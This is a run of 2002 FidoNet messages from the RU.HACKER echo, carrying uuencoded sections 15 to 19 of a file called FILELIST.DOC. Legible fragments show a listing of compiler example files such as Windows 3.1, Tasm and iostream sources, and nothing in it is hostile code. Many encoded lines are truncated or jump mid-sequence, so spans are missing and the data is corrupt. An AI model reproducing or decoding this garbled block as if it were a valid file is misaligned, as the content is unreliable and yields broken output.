M;F1O=W,@,RXQ(&5X86UP;&4@9FEL90T*("`@1$1%4U)64B`@(%!22B`M(%=I M;F1O=W,@,RXQ(&5X86UP;&4@9FEL90T*("`@1$1%4U)64B`@("!20R`M(%=I M;F1O=W,@,RXQ(&5X86UP;&4@9FEL90T*#0I&24Q%05!0("`@6DE0("T@1DE, M14%04"!E>&%M<&QE('!R;V=R86T-"B`@($9)3$5!4%`@("!#4%`@+2!%>&%M M<&QE('!R;V=R86T@;V8@5$9I;&57:6YD;W<-"B`@($9)3$5!4%`@("!04DH@ M+2!0&%M<&QE('!R;V=R86T-"B`@($U!2T5&24Q%("`@("`@+2!-86ME9FEL92!F M;W(@8G5I;&1I;F<@1DE,14%04"!E>&%M<&QE('!R;V=R86T-"@T*3$Q)0B`@ M("`@(%I)4"`M($QA&%M<&QE#0H@ M("!"4T-23$%04"`@4%)*("T@4')O:F5C="!F:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($)30U),05!0("`@4D,@+2!297-O=7)C92!F M:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($)43E1%4U0@ M("!#4%`@+2!"5$Y415-4(&1O8W5M96YT871I;VX@9&5M;R!P&%M<&QE#0H@("!#0D]85$535"`@0U!0("T@0T)/6%1%4U0@9&]C=6UE M;G1A=&EO;B!D96UO('!R;V=R86T-"B`@($-"3UA415-4("!04DH@+2!0&%M<&QE('!R;V=R86T-"B`@ M($-#5$Q415-4("!#4%`@+2!#=7-T;VT@8V]N=')O;"!E>&%M<&QE#0H@("!# M0U1,5$535"`@("!(("T@2&5A9&5R(&9I;&4@9F]R(&-U&%M<&QE M('!R;V=R86TN#0H@("!#1$Q'1$Q,("`@4%)*("T@4')O:F5C="!F:6QE(&9O M&%M<&QE('!R M;V=R86TN#0H@("!#3TQ/4D1,1R`@0U!0("T@26UP;&5M96YT871I;VX@;V8@ M5$-O;&]R0V]N=')O;"!F;W(@0T-43%1%4U0@97AA;7!L90T*("`@("`@("`@ M("`@("`@("`@('!R;V=R86TN#0H@("!#3TQ/4D1,1R`@1$Q'("T@1&EA;&]G M('5S960@:6X@0T-43%1%4U0@97AA;7!L92!P&%M<&QE('!R;V=R86T-"B`@($573D1415-4("`@4D,@+2!297-O=7)C M92!F:6QE(&9O&%M<&QE('!R M;V=R86T-"B`@($E.4U1415-4("!#4%`@+2!%>&%M<&QE(&]F(&9I&%M<&QE('!R;V=R86T-"B`@($U$251%4U0@("!0 M4DH@+2!0&%M<&QE('!R;V=R86T- sum -r/size 53300/7440 section (from first to last encoded line) --- UU Wizard v1.64.63 (c) Владислав Романович Дзюбов 1998-1999 * Origin: Default Origin (2:5061/120) = Здесь обитают хакеры ====================================================New= Msg : 3800 [1-10330] From : All 25-Aug-02 16:05:00 2:5061/120 To : All Subj : [15/23] FILELIST.DOC =====================================================================RU.HACKER= > Статус [■■■■■■■■■■■■■·······] < section 15 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M"B`@($U,0EA45%-4("!04DH@+2!0&%M<&QE('!R;V=R86T-"B`@($Y/5$E415-4 M("`@($@@+2!(96%D97(@9FEL92!F;W(@3D]4251%4U0@97AA;7!L92!P&%M<&QE('!R;V=R86T-"B`@($Y/5$E415-4("`@4D,@+2!297-O M=7)C92!F:6QE(&9O&%M<&QE('!R;V=R86T-"B`@(%!! M3%1%4U0@("!#4%`@+2!004Q415-4(&1O8W5M96YT871I;VX@9&5M;R!P&%M M<&QE('!R;V=R86T-"B`@(%-4051415-4("!#4%`@+2!35$%45$535"!D;V-U M;65N=&%T:6]N(&1E;6\@<')O9W)A;0T*("`@4U1!5%1%4U0@(%!22B`M(%!R M;VIE8W0@9FEL92!F;W(@4U1!5%1%4U0@97AA;7!L92!P&%M<&QE('!R;V=R86T-"B`@(%1204Y415-4 M("!04DH@+2!0&%M<&QE('!R;V=R86TN#0H@("!5 M4T5#1$Q,,B`@0U!0("T@4V]U&%M<&QE('!R;V=R86T-"B`@(%5314-$3$PR("!04DH@ M+2!0&%M<&QE('!R;V=R86T-"B`@(%9$3$=!4%`@("!04DH@+2!06QE(&=U:61E;&EN97,-"B`@($-5 M4U1#3E1,("`@4E<@+2!C=7-T;VT@8V]N=')O;"!A<&D@9&]C=6UE;G1A=&EO M;@T*("`@34%.54%,("`@("!25R`M(&UA;G5A;"!C;W)R96-T:6]N&%M<&QE('!R;V=R86T-"B`@($-2251415(@("!)0T\@+2!&:6QE M(&9O&%M<&QE('!R;V=R86T-"B`@($1%040R("`@ M("!"35`@+2!&:6QE(&9O&%M<&QE('!R;V=R86T- M"B`@($Q)5D4@("`@("!"35`@+2!&:6QE(&9O&%M M<&QE('!R;V=R86T-"B`@($U!3$54("`@("!#55(@+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($U!3$541$]7("!#55(@+2!& M:6QE(&9O&%M<&QE('!R;V=R86T-"B`@(%-7050@ M("`@("!04DH@+2!&:6QE(&9O&%M<&QE('!R;V=R M86T-"@T*5$9%6$U03"`@(%I)4"`M(%!A8VME9"!E>&%M<&QE(&9I;&5S(&9O M&5C=71A8FQE(&9I;&4@1F]R($,@4')O M9W)A;0T*("`@4%))344R("`@("`@0R`M($,@4')O9W)A;2!T;R!$96UO;G-T M&5C=71A8FQE(&9I;&4@1F]R($,@4')O9W)A M;0T*("`@4%))344U("`@("`@0R`M($,@4')O9W)A;2!T;R!$96UO;G-T Статус [■■■■■■■■■■■■■·······] < section 16 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M3TQ,("`@("!%6$4@+2!%>&5C=71A8FQE(&9I;&4@1F]R($,@4')O9W)A;0T* M#0I724XS,41%5B`@0T$Q("T@#0H@("!#3TU-1$Q'("`@1$Q,("T@0V]M;6]N M(&1I86QO9R!D;&P-"B`@($U!4E,@("`@("!$3$P@+2!096X@=VEN9&]W6YA;6EC(&1A=&$@97AC:&%N9V4@9&QL#0H@("!$ M24(@("`@("`@1%)6("T@9&5V:6-E(&EN9&5P96YD96YT(&)I=&UA<"!D&%M<&QE(&9I M;&4-"B`@($1)4U!,05D@("!)3D,@+2!487-M(&5X86UP;&4@9FEL90T*("`@ M345-("`@("`@($%332`M(%1A&%M<&QE(&9I;&4-"B`@($U%351%4U0@("!!4TT@ M+2!487-M(&5X86UP;&4@9FEL90T*("`@345-5$535"`@($U!2R`M(%1A&%M<&QE M(&9I;&4-"@T*5$%332`@("`@($-!,2`M(%1U0T*("`@1DE, M15,@("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@24U03U)4("`@($Q)0B`M(%=I;F1O=W,@:6UP;W)T2!E>&-E<'1I;VYS#0H@("!/5D523$%9("`@3$E" M("T@3W9E7,@;&EB0T*("`@5TE,1$%21U,@($]"2B`M($]B:F5C M="!C;V1E(&9O&%M<&QE('!R;V=R M86T-"B`@($--1$Q'05`@("!04DH@+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($U!2T5&24Q%("`@("`@+2!&:6QE(&9OFEP(&9I;&4-"B`@($-/3E9%4E0Q M("!)3D,@+2!487-M(&5X86UP;&4@9FEL90T*("`@0T].5D525#(@($E.0R`M M(%1A&%M<&QE(&9I;&4-"B`@($1%34\S("`@("!"050@+2!487-M(&5X86UP;&4@ M9FEL90T*("`@1DE,5"`@("`@($%332`M(%1A&%M<&QE(&9I;&4-"B`@($9)3%0@ M("`@("!-04L@+2!487-M(&5X86UP;&4@9FEL90T*("`@1DE,5"`@("`@(%)3 M4"`M(%1A&%M<&QE(&9I;&4-"B`@($]"651%2$D@("!!4TT@+2!487-M(&5X86UP M;&4@9FEL90T*("`@3T)95$5,3U<@($%332`M(%1A Статус [■■■■■■■■■■■■■■······] < section 17 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M#0H@("!/0EE414Y232`@05--("T@5&%S;2!E>&%M<&QE(&9I;&4-"B`@($]# M341.54T@("!!4TT@+2!487-M(&5X86UP;&4@9FEL90T*("`@3T524D58250@ M($%332`M(%1A&%M<&QE(&9I;&4-"B`@($]&24Q!3$]#("!!4TT@+2!487-M(&5X M86UP;&4@9FEL90T*("`@3T9)3$-,3U,@($%332`M(%1A&%M<&QE(&9I;&4-"B`@ M($]&24Q&4D5%("!!4TT@+2!487-M(&5X86UP;&4@9FEL90T*("`@3T9)3%)% M040@($%332`M(%1A&%M<&QE(&9I;&4-"B`@($]&3$9,55-(("!!4TT@+2!487-M M(&5X86UP;&4@9FEL90T*("`@3T9/4$5.4B`@($%332`M(%1A&%M<&QE(&9I;&4- M"B`@($],3T-!4T4@("!!4TT@+2!487-M(&5X86UP;&4@9FEL90T*("`@3U!! M4E-#340@($%332`M(%1A&%M<&QE(&9I;&4-"B`@($]04D]#1$]#("!!4TT@+2!4 M87-M(&5X86UP;&4@9FEL90T*("`@3U!23T-,24X@($%332`M(%1A&%M<&QE(&9I M;&4-"B`@($]34$%#15,@("!!4TT@+2!487-M(&5X86UP;&4@9FEL90T*("`@ M3U-43U)34$,@($%332`M(%1A&%M<&QE(&9I;&4-"B`@($]404)#3%(@("!!4TT@ M+2!487-M(&5X86UP;&4@9FEL90T*("`@3U1!0DY%6%0@($%332`M(%1A&%M<&QE M(&9I;&4-"B`@($]404)3150@("!!4TT@+2!487-M(&5X86UP;&4@9FEL90T* M("`@3U500T%312`@($%332`M(%1A&%M<&QE(&9I;&4-"B`@(%-(3U&%M M<&QE(&9I;&4-"@T*24]35%)34C$@(%I)4"`M(%)43"!S;W5R8V4@9FEL97,- M"B`@($9305140T@@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($930D%45$-(("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($930D-,3U-%("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($930D-44C$@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($930D-44C(@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($930D-44C,@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($930D144B`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($930D]&3$]7("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($930D]014X@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($930E-"548@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($930E-+3T9&("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($930E-93D,@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($930E5&3$]7("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($933U!%3B`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E/4U)#5%(R("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E/4U1!4TXQ("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E/4U1!4TXR("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E/4U135$0@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$%33C$@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$%33C(@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$1'150@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$1)4$98("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$5!5%=(("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$5"548@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$5#2%`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$5$0DP@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$5&3%0@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$5)3E0@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$5,1$),("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$5,3D<@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$532"`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$5524Y4("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$553$Y'("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$554T@@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$="548@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$=%5"`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$=,24Y%("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$=30TA2("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$=35%(@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$=50TA2("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35$E'3B`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35%!"04-+("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35%)%040@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($E35%@@("`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($U.4E-41DQ'("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($U.4T)!4T4@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($U.4T541DQ'("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($U.4T545R`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($U.4T9)3$P@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($U.4U!214,@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($]34D-44C$@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($]35$%33C$@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($]35$%33C(@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($]35$9,3T%4("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($]35$E"548@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($]35$E.5"`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($]35$E30TA2("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($]35$]01E@@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($]35$]31E@@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($]35$]55%-4("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($]35%!44B`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($]35%-+3T9&("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($]35%1%3$Q0("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($]35%=2251%("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@($]35%@@("`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-$0D-44B`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-$0D]&3$]7("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-$0E-+3T9&("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-$0E-93D,@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-$0E5&3$]7("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-20D-44C,@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-20D-44C4@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-20D1!3$,@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-20D144B`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-20DE.250@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-20D]&3$]7("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-20E-"548@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-20E-+3T9&("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-20E-93D,@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-20E5&3$]7("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-40D-44C(@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-40D1"4"`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-40D131U1.("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-40D134%1.("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-40E-%5$(@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-40E-'151.("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-40E-0551.("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-40E-40C$@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-40E5&3$]7("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-41%12("`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-424Y)5"`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-425=/4D0@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-44%=/4D0@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- sum -r/size 50768/7440 section (from first to last encoded line) --- UU Wizard v1.64.63 (c) Владислав Романович Дзюбов 1998-1999 * Origin: Default Origin (2:5061/120) = Здесь обитают хакеры ====================================================New= Msg : 3803 [1-10330] From : All 25-Aug-02 16:05:00 2:5061/120 To : All Subj : [18/23] FILELIST.DOC =====================================================================RU.HACKER= > Статус [■■■■■■■■■■■■■■■·····] < section 18 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M"B`@(%-44T541C$@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-44T541C(@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-44TM)4"`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-44UE.0R`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-45$E%("`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"B`@(%-455-)6D4@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@:6]S=')E86T- M"@T*34Q)0B`@("`@(%I)4"`M($UE9&EU;2!M;V1E;"!L:6)R87)I97,-"B`@ M($,P32`@("`@("!/0DH@+2!-961I=6T@;6]D96P@&%M<&QE('!R;V=R86T-"B`@($],14-, M3E0@("`@($@@+2!&:6QE(&9O&%M<&QE('!R;V=R M86T-"B`@($],14-,3E1%("!#4%`@+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"@T*4$%)3E0@("`@(%I)4"`M(%!!24Y4(&5X86UP M;&4@<')O9W)A;0T*("`@14Q,25!312`@($-54B`M($-U&%M<&QE('!R M;V=R86T-"B`@(%!!24Y4("`@("!04DH@+2!00T*("`@34%4 M2%,@("`@($Q)0B`M(%-M86QL(&UO9&5L(&UA=&@@;&EB0T*#0I45$9/ M3E0@("`@6DE0("T@#0H@("!&3TY4("`@("`@1$Q'("T@1FEL92!F;W(@3U=, M(&5X86UP;&4@<')O9W)A;0T*("`@34%+149)3$4@("`@("`M($9I;&4@9F]R M($]73"!E>&%M<&QE('!R;V=R86T-"B`@(%141D].5"`@("!#4%`@+2!&:6QE M(&9O&%M<&QE('!R;V=R86T-"B`@(%141D].5"`@ M("!04DH@+2!&:6QE(&9O0T*("`@4U=)3D1/0DH@ M($]"2B`M($]B:F5C="!F:6QE(&9O&%M<&QE(&9I M;&4-"B`@($1204=$4D]0("!$148@+2!7:6YD;W=S(#,N,2!E>&%M<&QE(&9I M;&4-"B`@($1204=$4D]0("!04DH@+2!7:6YD;W=S(#,N,2!E>&%M<&QE(&9I M;&4-"B`@($1204=$4D]0("`@4D,@+2!7:6YD;W=S(#,N,2!E>&%M<&QE(&9I M;&4-"@T*241%("`@("`@(%I)4"`M($9I;&5S(&EN($)O Статус [■■■■■■■■■■■■■■■■····] < section 19 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($E34D144B`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($E35$-44C$@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($E35$-44C(@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($E35$-44C,@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($E35$-44C0@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($E35$144C$@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($E35$144C(@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($E35$530TA2("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($E35$550TA2("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($E35$U!3DE0("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($E35%-+3T9&("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($E35%-+4$]3("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($E35%1%3$Q'("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($E35%=3("`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]&4T-44C$@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]&4T-44C(@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]&4T-44C,@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]&4T-44C0@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]&4T144B`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]34D-44C(@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]34D144B`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]35$-44C$@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]35$-44C(@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]35$-44C,@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]35$144C$@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]35$144C(@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]35$5.1$P@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]35$5.1%,@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]35$9,55-(("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]35$U!3DE0("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]35$U&3%-(("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@($]35%-+4$]3("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-$0D144B`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-$0E!"1DP@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-$0U12("`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-$1%12("`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-20D-44C$@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-20D-44C(@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-20D-44C0@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-20D92145:("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-20E-44B`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-20U12,2`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-20U12,B`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-21%12("`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40D%,0R`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40D-44C$@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40D1.15A4("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40D144B`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40D]&3$]7("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40E!"1DP@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40E-"548@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40E-%5$<@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40E-%5%`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40E-+3T9&("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40E-+4$]3("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40E-93D,@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40E1!3$,@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40TQ%05(@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40U12,2`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-40U12,B`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-41$5#("`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-41DQ!1U,@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-42$58("`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-43T-4("`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-44T544U0@("!#4%`@+2!3 